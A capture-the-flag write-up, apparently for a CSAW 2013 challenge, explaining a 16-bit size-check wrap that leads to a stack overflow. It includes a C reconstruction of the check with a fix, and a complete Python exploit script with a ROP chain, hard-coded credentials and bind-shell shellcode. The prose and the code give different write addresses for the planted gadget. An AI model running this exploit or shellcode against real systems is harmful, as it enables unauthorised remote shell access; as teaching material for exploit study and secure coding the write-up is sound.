The challenge is a network service. I can connect to it with netcat; it then asks for a username, a password and some other input.
After analysing the service I worked out the login process and found the username and password.
After entering the username and password, the program asks for a number (size) and a string (buff).
The checks on size are: size > 1 and size + 1 < 0x400.
Then I send the buff, which must consist of ASCII characters only.
Finally the program opens a file and writes the buff to it. If buff is longer than 0x400 bytes, only the first 1024 bytes are written.
The overflow happens when the program receives the string you send, but the check requires the length of buff to be less than 0x400. The check is done on size + 1, and that addition wraps at 16 bits, so a size of 0xffff passes it:
0xffff + 1 == 0; 0xffff == 65535
Now we can send a string of any length we want :)
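To make the wrap concrete, here is an added example in C (not code from the writeup or from the challenge binary, whose source is not on the page). It reconstructs the size check as the writeup describes it, with size held in a 16-bit variable (an assumption, but it is exactly what makes 0xffff + 1 == 0), puts the fixed check next to it, and simulates how many bytes of a recv() of that size would land past the end of the 0x400-byte buffer. Nothing is actually overflowed; the simulation only does the arithmetic.

```c
#include <stdint.h>
#include <stddef.h>

#define BUFSZ 0x400   /* the 0x400-byte buff described in the writeup */

/* Reconstruction of the check as the writeup describes it:
   size > 1 and size + 1 < 0x400, with size in a 16-bit variable
   (assumed; it is what makes 0xffff + 1 wrap to 0). */
int size_check_vulnerable(uint16_t size)
{
    uint16_t size_plus_one = size + 1;   /* 0xffff + 1 wraps to 0 here */
    return size > 1 && size_plus_one < BUFSZ;
}

/* Hardened check: do the arithmetic in a type that cannot wrap for any
   16-bit input, so the bound really constrains the value passed to recv(). */
int size_check_fixed(uint16_t size)
{
    uint32_t s = size;                   /* s + 1 is at most 0x10000, no wrap */
    return s > 1 && s + 1 < BUFSZ;
}

/* How many bytes of recv(fd, buff, size) would land past the end of buff
   when `check` is the guard in front of it. 0 means the request was
   rejected or fits. Pure arithmetic; no buffer is touched. */
size_t overflow_bytes(uint16_t size, int (*check)(uint16_t))
{
    if (!check(size))
        return 0;                        /* request rejected by the check */
    return size > BUFSZ ? (size_t)size - BUFSZ : 0;
}
```

With the vulnerable check, 65535 is accepted and 64511 bytes would be written past the buffer; with the fixed check the same request is rejected, while ordinary sizes such as 100 still pass both. The boundary value 0x3ff is rejected by both, as the original condition intends.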
Now the exploit. The payload layout is:
'A' * 0x420 + ret_address
There is no "jmp esp" gadget in the program (I checked with objdump), but the program uses read(), so I can call read() to write a "jmp esp" into a static area:
read(fd, buff, buffsize)
read: call 80486e0 read@plt
fd: 4 (the fd of the client socket)
read(4, *0x080486e0, 2)
Now send "jmp esp" and the program will write it into memory. The full payload is:
'A' * 0x420 + read + pop3ret + fd + static_area + "\x90" + shellcode
That is it. Run the exploit, then connect to the remote server with nc.
import sys, os, time, struct, socket

def p32(addr):
    return struct.pack("<I", addr)

def r(s, t=0.1):
    time.sleep(t)
    return s.recv(8192)

def se(s, buf):
    s.send(buf)

# HOST = "188.8.131.52"   # earlier target, overridden by the line below
HOST = "192.168.1.180"
PORT = 34266

# bind shell: listens on port 0x115c (4444) and execs /bin//sh
SHELLCODE = \
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" +\
"\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a" +\
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" +\
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" +\
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" +\
"\x0b\xcd\x80"

s = socket.socket()
s.connect((HOST, PORT))
print r(s)
se(s, "csaw2013")      # username
print r(s)
se(s, "S1mplePWD")     # password
print r(s)
se(s, "65535")         # size = 0xffff: size + 1 wraps to 0 and passes the check

read    = p32(0x80486e0)   # read@plt
pop3ret = p32(0x8049110)   # pop; pop; pop; ret, removes read's three arguments
static  = p32(0x804b000)   # static area that "jmp esp" gets written into
fd      = p32(4)           # fd of the client socket
jmpesp  = "\xff\xe4"       # jmp esp

buf  = "A" * 0x420                              # 1056 bytes of padding up to the saved return address
buf += read + pop3ret + fd + static + p32(2)    # read(4, static, 2)
buf += static                                   # then return into the freshly written "jmp esp"
buf += "\x90" * 100 + SHELLCODE                 # esp points here after the chain
se(s, buf)
time.sleep(5)
se(s, jmpesp)          # the 2 bytes that read() stores at the static address
print 'OK!!!'